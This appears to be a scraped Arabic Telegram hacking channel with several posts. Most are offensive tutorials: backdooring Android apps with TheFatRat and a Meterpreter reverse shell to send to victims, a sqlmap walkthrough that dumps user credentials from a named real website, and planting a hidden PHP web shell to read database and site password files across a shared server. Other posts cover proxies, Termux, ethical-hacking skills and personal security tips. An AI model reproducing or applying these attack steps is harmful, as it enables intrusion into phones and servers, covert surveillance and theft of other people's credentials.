أمن المعلومات
1.26K subscribers
192 photos
2 videos
21 files
821 links
Download Telegram
اختراق اجهزه الاندرويد عبر حقن التطبيقات من خلال اداة TheFatRat

بهذا الشرح سنقوم بأستخدام الاداه في حقن تطبيقات الاندرويد

في البدايه نقوم بتحميل الاداه من هنا

git clone https://github.com/Screetsec/TheFatRat.git

تثبيت الاداه:

cd TheFatRat

chmod +x setup.sh && ./setup.sh

قد ياخذ فتره من الوقت لـ التثبيت

بعد التثبيت نقوم بـ اعطاء ملفي fatrat وpowerfull.sh صلاحيه من خلال تنفيذ الامرين التاليه:

chmod +x fatrat

chmod +x powerfull.sh


لـ تشغيل الاداه ننفذ الامر التالي:

./fatrat

بعد تشغيل الاداه ستظهر لك قائمة بـ الخيارات !

بعد ذلك نقوم بـأختيار الخيار الخامس 

[05] Backdooring Original apk [Instagram, Line,etc]

ثم نقوم بـ أدخال الاي بي الخاص بنا والبورت
ثم نقوم بـ ادخال مسار التطبيق المراد حقنه

ثم نقوم بـ اختيار
(android/meterpreter/reverse_tcp) كطريقه اتصال بيني وبين الهدف وهو اتصال عكسي


ثم ننتظر بعض الوقت حتى تاتينا رساله بأن تطبيقنا جاهز

Your RAT apk was successfully builded and signed , it is located here :
/home/xabdullah/TheFatRat/backdoored/app_backdoor.apk


الان نقوم بالدخول على مجلد backdoored

cd backdoored

الان تطبيقنا الي قمنا بحقنه موجود بأسم  app_backdoor.apk نقوم بتغيير اسمه الى أي أسم ثم نقوم بـ ارساله الى الضحيه ( انت وطريقتك )

بعدها نقوم بالدخول على Metasploit لـلسيطره على جهاز الضحيه

ثم نقوم بـ استخدام multi_handler لتساعدنا على الارسال والاستقبال والتحكم عبر الامر التالي:

use exploit/multi/handler

ثم سنقوم بتحديد البايلود الي سبق قمن بحقنه بالتطبيق من خلال الامر التالي:

set payload android/meterpreter/reverse_tcp

ثم سنقوم بوضع الاي بي الخاص بنا الي سبق ووضعناه كوسيله اتصال, من خلال الامر التالي :

set LHOST 192.168.1.134

وايضا نطبق نفس الامر لـ البورت من خلال الامر التالي:

set LPORT 4444

ثم نقوم بكتابه run ثم help لاظهار اوامر الاختراق والتحكم في الضحيه



||•Tєαм | Hαcкєя || 🚫

قناتنا على التليجرام

t.me/KALITERMX
#السلام_عليكم.
واسف علي التأخير.

كتير منا سمع عن حاجه اسمها Proxy وتقريبا بنستخدمه كل يوم ومش عارفين معناه وبيعمل ايه ونستخدمه ازاي؟

هو ده موضوعنا النهارده😁
هنتعلم فيه
#ايه_الProxy_ده؟
#وبيعمل_ايه؟
#وايه_استخداماته_وانواعه؟
#ومميزاته_وعيوبه؟




- اولا مصطلح الproxy معناه الوكيل، الproxy هو عبارة عن وسيط بين مستخدمي الإنترنت وهو بمثابة الفلتر بأمكانه انه يقدر مايوصلكش لمواقع معينه ويمنعك انك توصلها او تدخلهاوف نفس الوقت بيساعدك في الوصول لبعض المواقع المحجوبه في بلدك من الشركه المذوده لخدمه الانترنت (ISP)

#بيشتغل_ازاي؟

الproxy عباره عن وسيط يعني لو طلبت موقع علي الانترنت هو بيترسل طلبك ده للبروكسي والبروكسي بيحول طلبك ده للسيرفر الخاص بالموقع الي انت طلبته وبعد كده السيرفر بيحول طلبك للبروكسي تاني وبيحولك للصفحه الي انت طلبتهاوطبعا العمليه دي بتتم في ثواني حسب قوة وجودة سيرفر البروكسي .

#ايه_انواعه؟


1- البروكسي الشفاف Transparent proxies :

- والنوع ده هو أضعف أنواع البروكسيً لأنه مابيغيرش الIp "عنوان المستخدم" ،بس بيتميز بالسرعه لانه عدد المستخدمين فيه قليل بس دي مش حاجه حلوه علشان نظام وقوة البروكسي ضعيف فممكن اختراقها بواسطه مستخدمين تانيين.

2- البروكسي مجهول الهوية Anonymous proxies :

- هو أفضل من النوع الأول لانه بيغير الIp الخاص بالمستخدمين ، وبيُستخدم في كسر الحجب والتصفح مجهول الهوية و الحماية من هجمات القرصنة الإلكترونية .

3- البروكسي شديد الخصوصية Highly anonymous proxies :

- يعتبر أقوي أنواع البروكسي لأنه مابيغيرش الIP الخاص بالمستخدمين وحسب ،لا وكمان بيسمح بالوصول إلي المواقع المحجوبه وأبرز مثال علي النوع ده هو متصفح تور TOR .

4- بروكسي DNS :

- يستخدم النوع ده من البروكسي في تتبع طلبات ال DNS من الشبكات المحلية إلي الخوادم أثناء التخزين المؤقت لتعزيز سرعة المعالجة .

5- بروكسي القرصنة Proxy Hacking :

- النوع ده من البروكسي هو الأسوء من حيث الإستخدام لانه يستخدمه الهاكرز
لمحاولة سرقة الزيارات من موقع آمن علي الإنترنت في محركات البحث وتحويلها لمواقع متقلده أو صفحات ويب مزورة بحيث بيقوم بخداع المستخدمين ويحصل علي المعلومات الخاصة بهم سواءً كانت مالية أو معلومات تانيه .

#ايه_مميزاته؟


1- السرعة في التصفح :

فح أكثر سرعة لأن

علي صفحة ويب قد طلبها أحد المستخدمين يقوم بتخزينها لديه فإذا قام مستخدم آخر

بطلب نفس الصفحة فإن البروكسي يقوم بعرضها له بدون الحاجة لطلبها من سيرفر

الموقع، كذلك فالبروكسي يستطيع قراءة ومعالجة المعلومات الخاصة بالمواقع بشكل

أسرع من مما يقوم به حاسوبك وهكذا يكون أداة مساعدة في تصفح أسرع وأكثر أماناً .

2- إخفاء هويتك علي الإنترنت :

- يُستخدم البروكسي في إخفاء هويتك علي الإنترنت من خلال تغيير الآيبي الخاص بك،

وبالتالي فالمواقع التي تقوم بتصفحها لن تستطيع الحصول علي أي معلومة عنك .

3- الدخول للمواقع المحجوبة :

- أحياناً بعض الدول بتحجب مواقع عن المستخدمين لأغراض سياسية زي بعض
الحكومات الي بتحجب مواقع التواصل الإجتماعي كفيسبوك وتويتر وغيرها، وبالتالي باستخدام خدمة البروكسي بتقدر تدخل للمواقع المحظورة بسهولة .


5- حجب المواقع باستخدام البروكسي :

- من المميزات أيضاً بأمكانك حجب مجموعة من المواقع علي الشبكة الخاصة بك
باستخدام البروكسي، زي موظفين ال it في الشركان الي بتعمل مراقبه كامله للشبكه وبتحجب مواقع او اي حاجه تخليك ماتقدرش توصلها الا بأذن.

7- تشفير اتصالك بواسطة البروكسي :

- لما تتصل بالإنترنت من خلال بروكسي كده انت بتقوم بتشفير بيانات اتصالك
بالإنترنت وبكده بتقدر تتجنب هجمات القراصنة علي الإنترنت .

بس كده موضوعنا خلص كده احنا عرفنا ايه او ال proxy واستخداماته وانواعه وقريب هنزل شرح ايه الفرق بينه وبين ال VPN وشرح ايه هو ال DNS وايه استخداماته وبيعمل ايه؟
واستنوني بشروحات تانيه كتير تخص الاجهزه والاختراق وشروحات للنت المجاني😁

اشوفكم ان شاء الله
شرح اختراق مواقع بستعمال sqlmap


بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
  الكل يعرف انه ثغرات sql
 من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة
اسم الأداة :sqlmap
لغة البرمجة : python
الأن كيفية استخدام الاداة في عملية الحقن
اولا : استخراج اسماء قواعد البيانات
لنقل ان هذا الموقع مصاب بثغرة sql
كود:
http://www.bcspeakers.com/page.php?id=22
وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط واذا وجد خطأ كان الموقع مصاب
الأن الأمر المستخدم في استخراج القواعد لهذا الموقع
كود:
python2 sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbs
النتيجة
كود:
available databases [2]:
[*] information_schema
[*] www-bcspeakerstest
مثل ما شفتو تم استخراج القواعد والان القاعدة المستهدفة هي " www-bcspeakerstest"
ثانيا : استخراج الجداول
القاعدة المستهدفة هي " www-bcspeakerstest"
سوف يكون الأمر بهذا الشكل
كود:
python2 sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables
والنتيجة كبيرة لن اضعها لانها تتكون من 59 جدول على كل حال انا وجدت الجدول المستهدف وهو "_user"
ثالثا : استخراج الأعمدة
الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user"
الكود كالتالي
كود:
python2 sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user --columns
والنتيجة كالتالي
كود:
+----------+---------------------------+
| Column   | Type                      |
+----------+---------------------------+
| id_user  | int(10) unsigned zerofill |
| password | text                      |
| username | text                      |
+----------+---------------------------+
كما ترون الأعمدة المستهدفة هي
password
username
رابعا : اسخراج البيانات من الاعمدة
العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump
النتيجة
كود:
+--------------+
| username     |
+--------------+
| becspeak2803 |
| becspeak2803 |
+--------------+
كما ترون استخرجنا اسم المستخدم
والان نأتي الى استخراج الباسورود
اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump
سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع قاعدة البيانات المرفقة باالأداة
كود:
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q]
تختار مثل ما نت عاوز
انا اخترت لا لتسريع العملية والنتيجة كالتالي
كود:
+----------------------------------+
| password                         |
+----------------------------------+
| 286adae502ad9d5ab8c4f8644050b448 |
| 286adae502ad9d5ab8c4f8644050b448


اعادة توجيه الرسالة من فضلكم لنشر المزيد
اداة termux-ubuntu لتشغيل الادوات الي تحتاج روت بدون مايكون جهازك فيه روت


#الاوامر
$ apt update $$ apt upgrade

$ pkg install git

$ git clone https://github.com/Neo-Oli/termux-ubuntu.git

$ pkg install wget proot

$ mkdir -p ~/jails/ubuntu

$ cd ~/jails/ubuntu

$ wget https://raw.githubusercontent.com/Neo-Oli/termux-ubuntu/master/ubuntu.sh

$ bash ubuntu.sh

الان خليه يتحمل لما يخلص حط هاذا الامر للتشغيل

$ ./start-ubuntu.sh

◆ ▬▬▬▬▬ ❴✪❵ ▬▬▬▬▬ ◆

#T̷H̷E̷̷M̷B̷R̷A̷T̷W̷R̷

t.me/lMTRI

◆ ▬▬▬▬▬ ❴✪❵ ▬▬▬▬▬ ◆
القرصنة الأخلاقي  أصبحت الان مهنة  مربحة يود معظم الناس اتباعها. بصفتك مخترقًا أخلاقيًا ، يمكنك إما أن تعمل في المنظمات  والشركات أو يمكنك تقديم خدماتك كمستقل. أمن الإنترنت والأنظمة هما شيئان يشكلان تحديا لكثير من الشركات والمنظمات . هذا يعني مباشرة أن مهاراتك كهاكر اخلاقي ستكون دائماً في حالة طلب مرتفع.
ولكن ، ما الذي يتطلبه الأمر لكي تكون هاكر اخلاقي؟ ما هي المهارات الخاصة التي أحتاجها لتكون واحد من هذا العالم؟ حسنًا ، إذا كنت ترغب ان تكون هاكر اخلاقي ، في ما يلي بعض المهارات التي تحتاجها:


1. مهارات البرمجة
تم تطوير جميع مواقع الويب وجميع أنواع البرامج بلغات برمجة مختلفة . تدور القرصنة حول الوصول إلى أساس هذه البرنامج. للوصول إلى هذا الأساس ، تحتاج إلى فهم جيد للغة البرمجة التي تم استخدامها لتطوير البرنامج.

بصفتك مخترقًا أخلاقًا ، يجب أن يكون لديك فهم مناسب للغات البرمجة المختلفة. ستساعدك هذه المهارة على أتمتة المهام المختلفة التي قد تستغرق وقتًا طويلاً إذا كنت تستخدم طرقًا يدوية أخرى. باستخدام مهارات البرمجة ، ستتمكن من استكشاف الأخطاء التي قام بها المطورون والتي قد تكون تهديدات أمنية.

لذا ، ما هي لغات البرمجة الضرورية للقراصنة الأخلاقية؟ يجب عليك تعلم لغات برمجة مختلفة لمنصات مختلفة. لتطبيقات الويب ، تعرّف على PHP و HTML و JavaScript. تتضمن لغات البرمجة الأساسية الأخرى للهاكرز الأخلاقيين SQL و Python و Perl و C و C ++.



2. لينكس
يتم تشغيل معظم خوادم الويب على نظام التشغيل Linux. وبصفتك مخترقًا أخلاقًا ، سيكون أحد أدوارك الأكثر تكرارًا هو الوصول إلى الخادم. هذا يجعل من نظام لينكس مهارة يجب أن يكون لها قرصنة أخلاقية . يجب أن يكون لديك معرفة وفهم متعمق لنظام التشغيل هذا.

خذ وقتك لاكتساب المعرفة والمهارات على التوزيعات الموجودة تحت لينكس . وهي تشمل Redhat و Ubuntu و Fedora. تعلم كل من واجهة المستخدم الرسومية وأوامر نظام التشغيل هذا.



3. التشفير

بصفتك مخترقًا أخلاقيًا ، سيكون أحد المجالات الرئيسية التي تثير قلقك هو نقل الرسائل بين أشخاص مختلفين. إذا كنت في شركة او مكان العمل، يجب أن تتأكد من أن الأشخاص المختلفين في أي منظمة قادرون على التواصل مع بعضهم البعض دون أن تتسرب الرسالة إلى الأشخاص الخطأ.   التشفير يستلزم تحويل نص عادي إلى نموذج غير قابل للقراءة والعكس صحيح.

من حيث الأمان ، يشجع التشفير السلامة ، السرية . كخادم ، قد يُطلب منك أيضًا إلغاء تشفير بعض الرسائل المشبوهة.



4. نظام إدارة قواعد البيانات (DBMS)

DBMS هو برنامج وبروتوكول يستخدمان لإنشاء وإدارة قواعد البيانات. أحد الأشياء التي يستهدفها معظم الهاكرز هي قاعدة البيانات. هذا لأنه من المحتمل تخزين كافة المعلومات المطلوبة في قاعدة البيانات. بصفتك مخترقًا أخلاقًا ، تحتاج إلى استغلال نقاط الضعف والتهديدات الأمنية لقواعد البيانات المختلفة.

باستخدام مهارات DBMS ، ستتمكن من تنفيذ جميع العمليات الأساسية في قاعدة البيانات : إنشاء وقراءة وتحديث وحذف. سيكون لديك فهم أعمق لمحركات قاعدة البيانات ومخطط قاعدة البيانات المختلفة. سوف تساعدك المعرفة والمهارات على نظام إدارة قواعد البيانات (DBMS) على فحص أنظمة تكامل البيانات والتوافق. ستقوم أيضًا بإجراء تسجيل ومراجعة قاعدة البيانات.



5. مهارات الشبكات
معظم التهديدات الأمنية تنشأ من الشبكات. هذا يجعل من عملية الربط بالكمبيوتر مهارة أساسية يجب أن يتعلمها أي هاكر أخلاقي طموح. يجب أن يكون لديك فهم عميق لكيفية ترابط أجهزة الكمبيوتر في الشبكة. يجب أن تكون جيدًا أيضًا في استكشاف جميع التهديدات الأمنية التي قد تكون موجودة في الشبكة وكيفية التعامل معها.



6. الهندسة الاجتماعية
كأخلاقي ، لن تقضي حياتك كلها عازمة على أجهزة الكمبيوتر. أنت أيضا بحاجة إلى بعض المهارات الاجتماعية. وفي هذا الجانب تظهر مهارة اخرى وهي  الهندسة الاجتماعية . تتطلب الهندسة الاجتماعية التلاعب أو إقناع الناس بإعطاء بعض المعلومات السرية. يمكن أن تكون هذه المعلومات كلمات المرور والتفاصيل المالية وأي شيء آخر يعتبر شخصيًا أو خاصًا جدًا.

وبصفتك مخترقًا ، يمكنك عندئذٍ استخدام المعلومات التي حصلت عليها للوصول إلى نظام أو تثبيت برنامج ضار. باستخدام مهارة الهندسة الاجتماعية ، ستتمكن من التفاعل مع هدفك دون الكشف عن نواياك.


#منقوله

#T̷H̷E̷̷M̷B̷R̷A̷T̷W̷R̷

@lMTRI
طريقة اختراق السيرفرات #شرح_حصري

لنفترض انك اخترقت موقع بأي ثغره .. او عندك انت موقع لك عند اي سيرفر

وبدك تخترق السيرفر طريقة اختراق السيرفر

اولآ بتحميل سكربت الشيل بلغة php على جهازك
وهي وصلة الشيل
http://www.alkaen.taqaniat.net/ShellsAlkaeN.zip
------------------------------------------------------------------------------
ال php شيل ((phpshell )) هو سكربت بلغة (( php ))

وبتقدر من خلالو تنفيذ اوامر اللينكس.. مثلا احضار باسوردات الـ مواقع يلي على السيرفر وايضا رؤية ملف الــ config
يلي على السيرفر

ولاكن لتنفيذ الاوامر هذه يجب عليك ان تقوم بتحميل الــ phpshell
على موقعك او الموقع الذي اخترقته..

بعد التحميل بتقدر تخترق السيرفر بشكل كامل ..

مثال ..👇

نفترض انك اخترقت هذا الموقع
http://www.Anonymous.com/
وقمت بتحميل الــ phpshell
على ملف download
رح يصير العنوان بهدا الشكل
www.Anonymous.com/download/phpshell.php

وبعدين اذا دخلنا الى العنوان رح تشوف كلمة اسمها Command وامامها فراغ

في الفراغ هذا رح نحط فيه اوامر اللينكس..

بس قبل البدء في الشرح الجديد.. احب اوضح نقطه مهمه ::--

يمكن لو شاف صاحب الموقع يلي اخترقتو الشيل.. يروح ويحذفه الك

ولاكن لو تسوي اثنين واحد منهم مخفي.. يعني الاول اذا حذفه راح يكون معانا واحد مخفي
لاخفائه نسوي هيك بهي الطريقة www.Anonymous.com/download/phpshell.php wget
وبعدين نقوم باخفائه.. نقوم بتغيير اسمه الى Mv phpshell.php .phpshell.php
ماذا تلاحظ ؟ اضفنا نقطة . واذا حذف الاول راح يكون معانا الثاني ومخفي
---------------------------------------------
والان بعد تحميل الشيل على الموقع
يصبح العنوان مثلا www.Anonymous.com/download/phpshell.php

وثم نجد كتابة اسمها Command وامامها فراغ

في الفراغ هذا ندخل اوامر اللينكس عليه..

ونحط الامر هذا مثلا ls /var/named
وهو لاحضار جميع المواقع التي على السيرفر..

ولاكن قبل البدء بالاوامر.. قد تستطيع ان تخترق السيرفر كاملا اذا لم يكن عليه الــ ((safe mode))

شرح الاوامر --==--
هلئ رح اعلمكم طريقة سحب : قواعد البيانات - المواقع - الباسوردات

نبدأ من الاسهل حتى الاصعب

1- قواعد البيانات
اكتب هذا الامر امام النص Command في الفراغ المقابل له
find / -name config.php
راح يطلع لك كل ملفات الكونفيج الي على السيرفر بالشكل هذا
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/forum/config.php
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/blacktalons/admin/config.php
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/bbs/config.php
(( المواقع يلي على السيرفر بالعادة بتكوين كثيرة وانا بالعادة يخرج لي 300و 250 موقع ))
المواقع رح تكون باللون الزهري

طيب بدنا نقرأ الي مكتوب داخل الملف هذا
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php

المهم نقرأ الي بداخله.. نكتب الامر هذا
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdo/اسم الملف/config.php

بعدين راح يطلع لك ملف الــ config.php
وبداخله يوجد اليوزر نيم والباسورد لقاعدة البيانات

روح اضرب المنتدى وبعدين ملف الــ admin ودخل اليوزر والباسورد لقاعدة البيانات
او الدخول عن طريق برنامج الــ MySQL-Front_2.5_Setup

-------------------------------------------------------
الأن خلصنا من قاعدة البيانات باقي باسوردات المواقع..

اكتب امام Command في الفراغ نكتب هذا الامر
find / -name service.pwd

وراح يطلع المواقع بالشكل هذا
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/_vti_pvt/service.pwd
التي باللون الزهري هي المواقع...
طيب هلق شوف الباسورد للموقع
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
راح نكتب الامر هذا
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd

وراح يجينا الباسورد للموقع ومشفر بمقياس DES

او نكتب الامر هذا
cat /home/*/public_html/_vti_pvt/service.pwd
او
cat /home/*/public_ht
بعدها بصير السيرفر والمواقع يلي على السيرفر تحت سيطرتك وتقدر تعمل فيهم يلي بدك ياه
#Amera_hk @Amera_hkk
اذا صار معك أي مشكلة ادخل للكروب واشرح مشكلتك وانا اساعدك

#منظمة_انونيموس_العربية
كل ما تريد ان تتعلمه حول
"امن المعلومات"🛡، "والاختراق"🤡
رابط القناه على التليجرام
https://t.me/joinchat/AAAAAFUI974HvW8zfIP2Ig

قروبنا على الواتس

https://chat.whatsapp.com/JA7cWpphCqS5E3w8Wqhle5
كيفية رفع الحظر عن رقمك في الواتس اب؟

:: الطريقة الأولى

1 – أنتقل إلى بريدك الإلكترونى gmail ثم أنقر على خيار إنشاء رسالة .

2 – فى موضوع الرسالة اكتب النص أدناه
My whatsapp account has deactivated by mistake

3 – فى محتوى الرسالة تقوم بكتابة النص أدناه مع ادخال رقم هاتفك الذى تم حظره من قبل شركة واتس أب مع مفتاح البلد الخاص بك

Hello, My Whatsapp account has deactivated by mistake Could you active my phone number is “اكتب رقمك هاتفك بالكامل هنا مع مفتاح البلد ” my mobile model “نوع هاتفك” thanks in advance.



4 – ثم فى الأخير أنقر على خيار إرسال كما فى سكرين شوت أعلاه .

:: الطريقة الثانية

فى حالة إذا لم يتم الرد عليك خلال 48 ساعة وحل المشكلة أتبع الأتى :

1 – انتقل إلى البريد الإلكترونى الخاص بك، ثم أنقر على خيار إنشاء رسالة .

2 – فى موضوع الرسالة ادخل النص أدناه
Please solve my problem

3 – فى محتوى الرسالة تقوم بكتابة النص التالى

Dear Sirs,

my Whatsapp account has been deactivated without any prior warning is not acceptable at all. I have been using the Whatsapp service for a while now in a proper manner، without sending any spam messages nor any unsolicited and inappropriate messages، and with that said you have managed to stop my account without prior…. notice Kindly take my case into consideration and get me exception from the Top Management my phone number is +”اكتب رقم الواتساب الخاص بك هنا”

4 – فى الأخير أنقر على ارسال .

خلال 48 ساعة سيتم الرد عليك من قبل دعم تطبيق الواتس أب موضحاً سبب حظر رقمك فى الواتس أب وما هى الأجراءات المطلوبة لحل هذه المشكلة . لذا، يجب عليك فقط التحلى بالصبر وسيتم الرد عليك .


ايميل شركة الواتساب👇🏻
Support@Whatsapp.com


🎭 #اسماعيل_فورجي 🎭
حتى لا تكن ضحية للأختراق تعلم كيف تحمي نفسك من الهكر والأختراق وحماية حساباتك

حماية أنفسنا من الأختراق هي من أهم المتطلبات التي نحتاجها في هاذا العصر نظراً لكثرة الهجمات الألكترونية التي يتعرض لها مستخدمين الأنترنت فبحسب الأحصائيات هناك شخص 1 من بين 20 أشخاص يتعرض للأختراق والأستفزاز الألكتروني لذالك من المهم ان تتعرف على كيفية حماية نفسك من الهكر والأختراق ..

اولاً عليك ان تعرف انه ليس هناك حماية 100%100 وحتى الأشخاص الذين لديهم خلفيه في أمن المعلومات ربما يتعرضون للأختراق بسبب انه هناك تطور هائل في اساليب الأختراق واكتشاف ثغرات جديدة تمكنهم من الوصول الى حساباتك بسهولة

لكن يبقى السؤال كيف يمكننا ان نحمي أنفسنا من اختراق اجهزتنا الألكترونية وحسابات التواصل الأجمتاعي !

1- اولاً يجب ان تكون حريص على عدم أستقبال اي ملفات مجهولة المصدر مثل تحميل برامج من غير موقعة الرسمي او تحميل تطبيقات من خارج الستور ... من اساليب الهكر في اختراق الأجهزة مثلاً هوا تلغيم البرامج المشهورة جداً التي عادة ما يستخدمها الناس بكثرة مثال على ذالك Adobe Photoshop فيستطيع الهكر دمج Server or Trojan مع البرنامج ورفعه على اي موقع رفع ملفات فعندما يقوم الشخص بتنزيله وفتحه يتم أختراق جهازة ! .. فعند أختراق الجهاز يستطيع الهكر او المخترق تحكم بجهازك بل كامل مثلما كأنه يجلس امام كومبيوترك مباشرة من مشاهدتك على الكاميرا وتجسس على ما تكتبه وسرقة ملفاتك وغيرها

والأمر ايضاً ينطبق على هواتف النقاله مثل Android فهي اكثر عرضه للأختراق .. ربما يتوقع بعض الأشخاص انه من الغير الممكن أختراق الهواتف ! وهذه غير صحيح فيستطيع الهكر او المخترق من اختراق هاتفك بسهوله بعدة طرق وبستخدام عدة أدوات اختراق مثل Metasploit or Armitage او برامج Rat المعروفة ... من اشهر طرق الأختراق هوا ارسال ملف Backdoor مدمج مع تطبيق بصيغة APK مع اي تطبيق مشهور مثل الفيس بوك او الأنستغرام .. وسيعمل التطبيق على هاتفك بشكل طبيعي لكنك لا تعلم بل فعل انه تم اختراقك لئن بل عاده يشتغل Backdoor بخفاء ولن تشعر ان هناك ملف ضار على هاتفك ... ويستطيع الهكر التجسس على مكالماتك ورسائلك الأمر اشبه بأن هاتفك بين يدية ! لذا كن حريص على عدم تنزيل اي تطبيق من خارج الستور

2 - لا تقم بضغط على اي روابط مختصرة او مجهولة المصدر من اشخاص لا تعرفهم معرفة جيدة ... بعض هذه الروابط تحتوي على ملفات ملغمه ! فبعض طرق الأختراق المتقدم هوا تلغيم payload مع رابط مباشر بحيث عند الضغط على الرابط يتم اختراقك مباشرة دون تثبيت اي شي

وربما تحتوي هذه الروابط على صفحات مزورة لمواقع مشهورة لمواقع التواصل الأجتماعي مثل Facebook او Snapchat أو غيرها من المواقع المعروفة وهي صفحات شبيها جداً للموقع الأصلي ويتم استعمالها لغرض معين وهوا اختراق الحسابات وليس الأجهزة فعد فتح مثل هاذه الروابط يتم توجيهك مباشرة الى الفيس بوك ويطلب منك ادخال الأميل وكلمة المرور ! وبمجرد كتابتك لهذه المعلومات يتم ارسالها للهكر

3- عليك تأمين حساباتك بشكل جيد واختيار كلمة Password قوية للغاية فلا تقم بأستعمال كلمات مرور المعروفة مثل 12345678 او رقم الهاتف الخاص بك او اسمك واسم العائله ! بل يجب ان تحتوي كلمة المرور Password على كلمات وارقام وحروف كبيرة وصغيرة مثال على ذالك Tareq@poouyu%1299&@@#ff ... ربما قد تتخيل انه من الصعب عليك حفظه لكن مع الممارسه سوف تحفظة سريعاَ

في حال قيامك بأستخدام كلمة مرور سهله سيكون من السهل التخمين على حساباتك يوجد هجوم يستعمله الهكر وهوا brute force attack او ما يعرف بلهجوم الخاشم .. وهوا هجوم يستطيع الهكر من خلاله بتخمين على حسابات الضحيه بستخدام ادوات يتم برمجتها بلغة paython بأضافة الباسووردات المحتمله او ما يعرف في list password ويتم تجربه الباسووردات بسرعه فائقة بأتصال عكسي مع موقع Facebook كمثال فعند وجود الباسوورد الصحيح يخبر الهكر انه تم ايجاد الباسوورد الحقيقي للحساب !

4- حدث معلوماتك الشخصيه في مواقع التواصل الأجتماعي بشكل دوري .. تتيح لك مواقع التواصل الأجتماعي حماية قصوى لمستخديمها فيجب عليك حماية حساباتك من الأختراق بربط رقم هاتفك الحقيقي مع الحساب .. في حال تم اختراقك فتستطيع استرجاع كلمة المرور بستخدام هاتفك وايضاً يمكنك تفعيل خيار ( التحقق بخطوتين ) وهوا خيار مهم جداً فمن خلاله لن يستطيع اي شخص الدخول الى حسابك الا عند حصولة على كود رمز التحقق

ايضاً عليك التأكد من الأميل Email المرتبط في حسابك ومن المستحسن عمل ايميل على موقع Gmail وفي حال كان حسابك مرتبط في اميلات مثل Hotmail او Yahoo قم بتغييره على الفور !
فيوجد ثغره في هذه الدومينات في حال انك لم تقم بفتح اميلك لمده 6 اشهر يصبح الأميل متاح للأستخدام وبهذه الثغرة يستطيع الهكر عمل اميل بنفس اميل المرتبط بحسابك ويستطيع اختراقه بعمل forgot password للحساب والدخول
عليه َ

5- لا تعتمد على برامج الحماية مثل برامج antivirus لا شك ان برامج الحماية مهمه لحماية الجهزة لكن يستطيع الهكر او المختراق خداع هذه البرامج بتشفير البرامج الضارة ( بتغيير قيم Server ) واختراق اجهزتك ! فيعتبرها برنامج الحماية لديك على انها برنامج سليم وليس ضار لذا وجب التنبيه

6- ينصح دائماً على عمل فورمات لأجهزتك كل فتره بين الشهرين وا 3 اشهر لكي تتأكد من عدم قيام اي شخص بأختراقك فعند عمل فورمات للهاتف او للكمبيوتر سوف يفقد الهكر من التحكم بأجهزتك في حال أختراقك

يوجد الكثير من طرق الحمايه سوف اذكرها لحقاً حتى لا تملو من القرأة وسوف اظيفها في وقت لاحق ان شاء الله .. اتمنى قد فادتكم هذه المعلومات
بسم الله نبدأ

اولا ح نتعرف ع الارجمنت اللي في الميتا ونعرف كل واحد واستخداماته


1/ show يعني عرض او اظهر لي

2/ use يعني إستخدام او فعل لي
3/ options يعني الخيارات او المتطلبات
4/ sessions يعني الجلسات او الجلسه المفتوحه
5/exploit يعني إستغلال او استغل هذا الشئ
6/search بحث ودي لو انت عارف ثغرة او بيلود مسبقا وداير تباشر في العمليه طوالي من غير الخطوات السابقه

طبعا دي أهم الارجمنت ال ح نحتاج ليها في عملية الإختراق عن طريق الميتا

نجي لي استخدام الارجمنت حسب الترتيب او الحوجه

اولا عشان نعرض الثغرات او البيلودات المتاحه في الميتا ح نستخدم الارجمنت show ونكتب الحاجه الحابين نعرضها
مثال

show payloads

ننتظر حتى يعرض لينا البايلودات المتوفره


ونجي لي استخدام الارجمنت use
عشان نبدأ عملية الإختراق
مثال
بعد عرضنا البايلودات خلونا نقول جاب لينا نتيجه وحده وهي :

android/reverce/tcp

ح نكتب الآتي:
use android/reverce/tcp

وبعدها ح نجي لي ارجمنت ال options

نكتب فقط
options

وهنا ح يجيب لينا المعلومات المطلوبه لعمليه الإختراق

غالبآ بطلب منك حاجتين الهوست والبورت
وح نكتب مثال :
set RHOST 127.0.0.1
انتر وبعدو نكتب البورت الفاتح
مثال :
set RPORT 4444

بعد كده نجي لي ارجمنت exploit

ونكتبه مباشر بعد الخطوات السابقة
exploit

وح تبدأ معاك عملية الإختراق

وح نكتب الارجمنت sessions عشان نعرض الجلسه ونشوف عندنا كم ضحيه متصل

#يتبع
السلام عليكم ورحمة الله

صباح الخير يا شباب

ح نبدأ شرح زي ما اتفقنا حسب التصويت

واكتر تصويت كان

عن طريق الايبي ونوع المتصفحات

يلا ي شباب حاجه مهمة شديد

عشان تعرف الايبي ونوع المتصفحات الشغاله عند الضحيه

يلزمك حاجتين !


الاولى انك تكون مثبت اداة ngrok وشغاله معاك من غير اي مشاكل عشان ح نحتاج لي الهوست والبورت من خلال ngrok.
